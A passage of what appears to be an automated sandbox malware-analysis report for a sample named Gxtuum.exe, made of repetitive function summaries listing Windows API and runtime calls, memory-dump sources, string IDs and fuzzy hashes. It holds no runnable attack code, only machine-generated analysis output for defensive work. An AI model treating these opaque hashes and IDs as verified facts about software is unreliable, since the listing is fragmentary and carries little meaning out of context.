                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                • API String ID: 0-1719652438
                                                                • Opcode ID: f7cfd976577f0ee9c794300ede510794da5f9695e32397ad9907ea3da2624d60
                                                                • Instruction ID: 0a16cb424732bf75f794bdc2573a76de82e68b4003b28ebe3485d2ac29d04f5d
                                                                • Opcode Fuzzy Hash: f7cfd976577f0ee9c794300ede510794da5f9695e32397ad9907ea3da2624d60
                                                                • Instruction Fuzzy Hash: 5821F271200206BF9B28AF64AC809EBB7ACEF10364725413CF96DCB190DB75DCC187A0
                                                                APIs
                                                                • FreeLibrary.KERNEL32(00000000,?,?,0010DEB8,?,?,00000000,?,?,0010DF6A,00000002,FlsGetValue,001333D8,001333E0,?), ref: 0010DE87
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: FreeLibrary
                                                                • String ID: api-ms-
                                                                • API String ID: 3664257935-2084034818
                                                                • Opcode ID: 1bacbfb87c9b143c057d81b260fb57016a62a71a35dc66335a6fafe5a734f1eb
                                                                • Instruction ID: 7ff05bdb137b88191909e55fc68cf6957304ecba2a57e075cd835fa4d2e95e7c
                                                                • Opcode Fuzzy Hash: 1bacbfb87c9b143c057d81b260fb57016a62a71a35dc66335a6fafe5a734f1eb
                                                                • Instruction Fuzzy Hash: 3D11C631A41221BBDF224BB8EC45B5A7794AF25B70F260220FD51EF2C0D7B0ED4086D4
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0010E287,?,?,0010E24F,00000000,00000000,?), ref: 0010E2A7
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0010E2BA
                                                                • FreeLibrary.KERNEL32(00000000,?,?,0010E287,?,?,0010E24F,00000000,00000000,?), ref: 0010E2DD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: 140cbcf31cddbefdfac5b30fa5cb9a4f63d4862c49c5a0a343b1d8ac611286b1
                                                                • Instruction ID: b08d25d593ff054763ea55c32dbb6d13d30d2d156384adbc18996e1b9fffb184
                                                                • Opcode Fuzzy Hash: 140cbcf31cddbefdfac5b30fa5cb9a4f63d4862c49c5a0a343b1d8ac611286b1
                                                                • Instruction Fuzzy Hash: 9EF03031A44219FBDB11AB51ED0ABDEBEB9EF00756F104060F901E25A0CBB58F40DB95
                                                                APIs
                                                                  • Part of subcall function 001171C0: GetLastError.KERNEL32(00000000,00000000,?,00117FA7,?,00000000,00000000,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010), ref: 001171C5
                                                                  • Part of subcall function 001171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010,00111502,00000000,00000000,00000000), ref: 00117263
                                                                • _free.LIBCMT ref: 0011604B
                                                                • _free.LIBCMT ref: 00116064
                                                                • _free.LIBCMT ref: 001160A2
                                                                • _free.LIBCMT ref: 001160AB
                                                                • _free.LIBCMT ref: 001160B7
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorLast
                                                                • String ID:
                                                                • API String ID: 3291180501-0
                                                                • Opcode ID: 92a630b7b23dd749aecc8e52797c5c9010fc7260048316e88b1ffa31eaa3ce00
                                                                • Instruction ID: 51946bf4af9f1fdb60f0cc10d0708ed8e111091c67501ba572bd8d30fad8d74e
                                                                • Opcode Fuzzy Hash: 92a630b7b23dd749aecc8e52797c5c9010fc7260048316e88b1ffa31eaa3ce00
                                                                • Instruction Fuzzy Hash: 00B1397590161ADFDB28DF18C884AEDB3B5FF58304F5085AAE849A7290E771AED0CF40
                                                                APIs
                                                                  • Part of subcall function 001187D5: RtlAllocateHeap.NTDLL(00000000,00100FD7,?,?,0010A1C2,00100FD7,?,001037BE,8B18EC84,74DF0F00), ref: 00118807
                                                                • _free.LIBCMT ref: 001159E4
                                                                • _free.LIBCMT ref: 001159FB
                                                                • _free.LIBCMT ref: 00115A18
                                                                • _free.LIBCMT ref: 00115A33
                                                                • _free.LIBCMT ref: 00115A4A
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$AllocateHeap
                                                                • String ID:
                                                                • API String ID: 3033488037-0
                                                                • Opcode ID: f73a2a72c39d4b527f840937e3dc6b6c80c2a855b3dc22364f5a5da06cce6af1
                                                                • Instruction ID: 8b17ba3761a40a20a38da10916b4ea71081da0c28e9052c55f39dbd69bcce02f
                                                                • Opcode Fuzzy Hash: f73a2a72c39d4b527f840937e3dc6b6c80c2a855b3dc22364f5a5da06cce6af1
                                                                • Instruction Fuzzy Hash: A6510431A00708EFDB29DF69DC81AAAB3F6EF94724F004679E405D7251E731EA818B50
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
                                                                • String ID:
                                                                • API String ID: 3354401312-0
                                                                • Opcode ID: 4f38d947dd8aead6afb7d70760b13691caef8b1a333a5b739891306ddd75e9c8
                                                                • Instruction ID: bf3c2a2986b4e433c90e86415bfc079f80682a7175fcaef0c03bb4692545e78e
                                                                • Opcode Fuzzy Hash: 4f38d947dd8aead6afb7d70760b13691caef8b1a333a5b739891306ddd75e9c8
                                                                • Instruction Fuzzy Hash: 62617AB0D05209DFDB14DFA4C954BAEBBB8BF05304F104169E845AB382DBB5AA05CFA0
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 000EF547
                                                                • CoCreateInstance.OLE32(0013DFEC,00000000,00000001,0013E04C,?), ref: 000EF563
                                                                • CoUninitialize.OLE32 ref: 000EF571
                                                                • CoUninitialize.OLE32 ref: 000EF630
                                                                • CoUninitialize.OLE32 ref: 000EF644
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Uninitialize$CreateInitializeInstance
                                                                • String ID:
                                                                • API String ID: 1968832861-0
                                                                • Opcode ID: 250630df70634cc582c4dec984024b2a5c50f0189e4c41627e5fae1668a86df8
                                                                • Instruction ID: 10cba4754c021b1bd1e8b0dc52726eeb8899c629f7eb18d139f77193d54eb9a0
                                                                • Opcode Fuzzy Hash: 250630df70634cc582c4dec984024b2a5c50f0189e4c41627e5fae1668a86df8
                                                                • Instruction Fuzzy Hash: 6E51A071A00249AFDB04DF65D888BEEBBB9EF58314F508129F505F7690D775A940CBA0
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00105336
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00105356
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00105376
                                                                • std::_Facet_Register.LIBCPMT ref: 00105411
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00105429
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                • String ID:
                                                                • API String ID: 459529453-0
                                                                • Opcode ID: 958ab25e982f1fa982d90f163a99acf6de8f80cec36994f3491fd0a9049be62d
                                                                • Instruction ID: 5c47ffdc3bc80415db7d80dfaff98fb4109c58f0514668b30f5c2923fe6a5cd5
                                                                • Opcode Fuzzy Hash: 958ab25e982f1fa982d90f163a99acf6de8f80cec36994f3491fd0a9049be62d
                                                                • Instruction Fuzzy Hash: 1F41DB71A046148BCB24DF94D891BAFB7B1FB10750F14416DE885AB2D2DBB0AD41CFC0
                                                                APIs
                                                                • _free.LIBCMT ref: 001212C3
                                                                  • Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
                                                                  • Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE
                                                                • _free.LIBCMT ref: 001212D5
                                                                • _free.LIBCMT ref: 001212E7
                                                                • _free.LIBCMT ref: 001212F9
                                                                • _free.LIBCMT ref: 0012130B
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 57c3080107bfd6484526c6dc4c0b97262882e65fdfd59cad3f49b8994cab46f8
                                                                • Instruction ID: 40c2ab29af0652240c3ab8723107d59f5a7215e96ea344e2803d8fa996e69510
                                                                • Opcode Fuzzy Hash: 57c3080107bfd6484526c6dc4c0b97262882e65fdfd59cad3f49b8994cab46f8
                                                                • Instruction Fuzzy Hash: 2DF0FF32504710B7C668DB65F8C1C9AB3EAEBA27247644815F008E7A11CB64FCD04664
                                                                APIs
                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 000E499F
                                                                  • Part of subcall function 0010B446: RaiseException.KERNEL32(E06D7363,00000001,00000003,000E25DC,00100FD7,8B18EC83,?,000E25DC,?,0014458C), ref: 0010B4A6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ExceptionRaise___std_exception_copy
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 3109751735-1866435925
                                                                • Opcode ID: e3c121aeb13608bdafdc4641c36b4d9f5072d16cc31d4b1e0e6409ee0e3e3264
                                                                • Instruction ID: 846e26d5a2fd8925943d3f2320ee7275e11263505f9480d6d21ffe2b15cf7c1b
                                                                • Opcode Fuzzy Hash: e3c121aeb13608bdafdc4641c36b4d9f5072d16cc31d4b1e0e6409ee0e3e3264
                                                                • Instruction Fuzzy Hash: 111138B1600744AFC710DF59C942B97B7ECEF51310F14852AF865BB682EBB0E914CB91
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _strrchr
                                                                • String ID:
                                                                • API String ID: 3213747228-0
                                                                • Opcode ID: a747bd915aba6517dd4d41587f6b2d132dafeedf1d0584c430e1709dc9ca69dd
                                                                • Instruction ID: 01b1fa65dc316c254c0790501d370e3f2fd7fcbdf83ec27eb9505082b9956c75
                                                                • Opcode Fuzzy Hash: a747bd915aba6517dd4d41587f6b2d132dafeedf1d0584c430e1709dc9ca69dd
                                                                • Instruction Fuzzy Hash: 36B147729002859FDB19CF68C8A1BFEBBE5EF55300F15407AE865DB281D7348D81CB60
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: AdjustPointer
                                                                • String ID:
                                                                • API String ID: 1740715915-0
                                                                • Opcode ID: f40b26d4a41e4589533aa807de5d32cc193b8c5ad9d7bf9552e9cccfd2bbe2db
                                                                • Instruction ID: a5923b7cfc2afc90f983661ba7d73fd6d8d74e19b643899eda53915f1eb4d227
                                                                • Opcode Fuzzy Hash: f40b26d4a41e4589533aa807de5d32cc193b8c5ad9d7bf9552e9cccfd2bbe2db
                                                                • Instruction Fuzzy Hash: CA51E172605207AFDB289F50D881BAAB7A6FF14700F244229F885972E1D7B1ED41CFD1
                                                                APIs
                                                                • __Mtx_unlock.LIBCPMT ref: 001062E7
                                                                • std::_Rethrow_future_exception.LIBCPMT ref: 00106339
                                                                • std::_Rethrow_future_exception.LIBCPMT ref: 00106349
                                                                  • Part of subcall function 000E3A60: __Mtx_unlock.LIBCPMT ref: 000E3B54
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Mtx_unlockRethrow_future_exceptionstd::_
                                                                • String ID:
                                                                • API String ID: 3298230783-0
                                                                • Opcode ID: e27565234d5db964981988c508b331e12ee59b7fbc89393706a6740dac274376
                                                                • Instruction ID: e32fe690e370cc555eb649cf8d4d71c2e879b554a2a1d7c2794849c83b0efb80
                                                                • Opcode Fuzzy Hash: e27565234d5db964981988c508b331e12ee59b7fbc89393706a6740dac274376
                                                                • Instruction Fuzzy Hash: B4411B71D043489FCB14EBA4D842BAFBBF8AF15300F04456DF5C667682EBB1A954C7A2
                                                                APIs
                                                                • _free.LIBCMT ref: 0012764E
                                                                • _free.LIBCMT ref: 00127677
                                                                • SetEndOfFile.KERNEL32(00000000,00123DDD,00000000,00124074,?,?,?,?,?,?,?,00123DDD,00124074,00000000), ref: 001276A9
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00123DDD,00124074,00000000,?,?,?,?,00000000), ref: 001276C5
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFileLast
                                                                • String ID:
                                                                • API String ID: 1547350101-0
                                                                • Opcode ID: a1424fc753bcac3fd48575eaa8a495f3e1b04fd1c94920ffb4e4c12d917f9bd1
                                                                • Instruction ID: cc91060b48bd517ffa1f3f39da9b4a0dc287580d4606065f092639bd75e8f755
                                                                • Opcode Fuzzy Hash: a1424fc753bcac3fd48575eaa8a495f3e1b04fd1c94920ffb4e4c12d917f9bd1
                                                                • Instruction Fuzzy Hash: 2F41EB72904A11ABEB196BBCEC46BDF7B75EF64360F150524F924E72D1DB30C8A08761
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 303d7667110cba0a3964292dbf3e1d73f80d028eb66571999716b7754368d73a
                                                                • Instruction ID: b53bc83b5615dc4c73a9f20fbb01cf9fc5d2f354a7238341a6ce718b0dc673bf
                                                                • Opcode Fuzzy Hash: 303d7667110cba0a3964292dbf3e1d73f80d028eb66571999716b7754368d73a
                                                                • Instruction Fuzzy Hash: 0B41C871A00755AFE724AF39CC41B9ABBE9EB98710F10892EF151DB2C1D7B1A9418790
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                                • String ID:
                                                                • API String ID: 3264154886-0
                                                                • Opcode ID: 3319c8ec9d977d2647e5bbb655a44da40d7d0afce8ae3f6f89be2d638c4c3e8b
                                                                • Instruction ID: fa1c9ae8dc4ef389e07ba0a4715b50c144d7b6d32d5a31cf407337ac83f1f98a
                                                                • Opcode Fuzzy Hash: 3319c8ec9d977d2647e5bbb655a44da40d7d0afce8ae3f6f89be2d638c4c3e8b
                                                                • Instruction Fuzzy Hash: 7541CCB1A016159FCB15DB35C844B5ABBE8FF29310F004539E85AD7791EB71EA00CBC1
                                                                APIs
                                                                  • Part of subcall function 0010ED48: _free.LIBCMT ref: 0010ED56
                                                                  • Part of subcall function 0011E84F: WideCharToMultiByte.KERNEL32(00000000,00000000,8B18EC83,?,00000000,8B18EC83,001184E7,0000FDE9,8B18EC83,?,?,?,00118260,0000FDE9,00000000,?), ref: 0011E8FB
                                                                • GetLastError.KERNEL32 ref: 0011F40B
                                                                • __dosmaperr.LIBCMT ref: 0011F412
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0011F451
                                                                • __dosmaperr.LIBCMT ref: 0011F458
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                • String ID:
                                                                • API String ID: 167067550-0
                                                                • Opcode ID: b5dd32a7f6723a5a64753abc66c2d9454aed730034f71be52b0681b1b3a23056
                                                                • Instruction ID: 2519a72800777708db05bd45e726568234723f72255af1eaecbabe9360fffb61
                                                                • Opcode Fuzzy Hash: b5dd32a7f6723a5a64753abc66c2d9454aed730034f71be52b0681b1b3a23056
                                                                • Instruction Fuzzy Hash: E721B071600219BF9B28AF668C809EBB7A8EF10364714853DF96997550DB31ECC1C760
                                                                APIs
                                                                • GetLastError.KERNEL32(00000000,00000000,?,00117FA7,?,00000000,00000000,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010), ref: 001171C5
                                                                • _free.LIBCMT ref: 00117222
                                                                • _free.LIBCMT ref: 00117258
                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010,00111502,00000000,00000000,00000000), ref: 00117263
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_free
                                                                • String ID:
                                                                • API String ID: 2283115069-0
                                                                • Opcode ID: 74ef48cd130f7ebab0b2fd09f384525e8e8303748d863df6e2d38fc8b956bdb8
                                                                • Instruction ID: 6cedb3d341b795c08f1ba0de6337a1556594f02c89d8c4516513307c4e2bb3ba
                                                                • Opcode Fuzzy Hash: 74ef48cd130f7ebab0b2fd09f384525e8e8303748d863df6e2d38fc8b956bdb8
                                                                • Instruction Fuzzy Hash: 2811A33220C2017BDB5D26B4AC81EEB297A9BE37747250735F524966F1DF66CCC28111
                                                                APIs
                                                                  • Part of subcall function 001083B9: GetModuleHandleExW.KERNEL32(00000002,00000000,00000000,?,?,0010840B,00000014,?,0010844C,00000014,?,000E2D32,00000000,00000014,00000000,455139FB), ref: 001083C5
                                                                • __Mtx_unlock.LIBCPMT ref: 0010849E
                                                                • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,455139FB,?,?,?,Function_00048C80,000000FF), ref: 001084C6
                                                                • __Mtx_unlock.LIBCPMT ref: 00108501
                                                                • __Cnd_broadcast.LIBCPMT ref: 00108512
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
